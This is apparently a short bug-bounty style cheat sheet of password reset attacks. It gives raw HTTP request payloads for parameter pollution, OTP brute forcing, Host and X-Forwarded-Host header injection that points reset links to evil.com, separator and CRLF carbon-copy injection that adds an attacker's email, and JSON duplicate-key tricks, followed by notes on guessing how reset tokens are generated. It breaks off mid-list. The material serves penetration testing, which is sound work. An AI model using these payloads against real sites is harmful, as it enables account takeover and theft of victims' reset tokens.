Password Reset Flaws

1. Parameter pollution in reset password

POST /reset
[...]
[email protected]&[email protected]

2. Bruteforce the OTP code

POST /reset
[...]
[email protected]&code=$123456$

3. Host header Injection

POST /reset
Host: evil.com
[...]
[email protected]

POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
[email protected]

And the victim will receive the reset link with evil.com

4. Using separator in value of the parameter

POST /reset
[...]
[email protected],[email protected]

POST /reset
[...]
[email protected]%[email protected]

POST /reset
[...]
[email protected]|[email protected]

POST /reset
[...]
[email protected]%[email protected]

5. No domain in value of the paramter

POST /reset
[...]
email=victim

6. No TLD in value of the parameter

POST /reset
[...]
email=victim@mail

7. Using carbon copy

POST /reset
[...]
[email protected]%0a%0dcc:[email protected]

8. If there is JSON data in body requests, add comma

POST /newaccount
[...]
{“email”:“[email protected]”,”[email protected]”,“token”:”xxxxxxxxxx”}

9. Find out how the tokens generate

• Generated based on TimeStamp
• Generated based on the ID of the user
• Generated based on the email of the user
• Generated based on the name of the user

For Example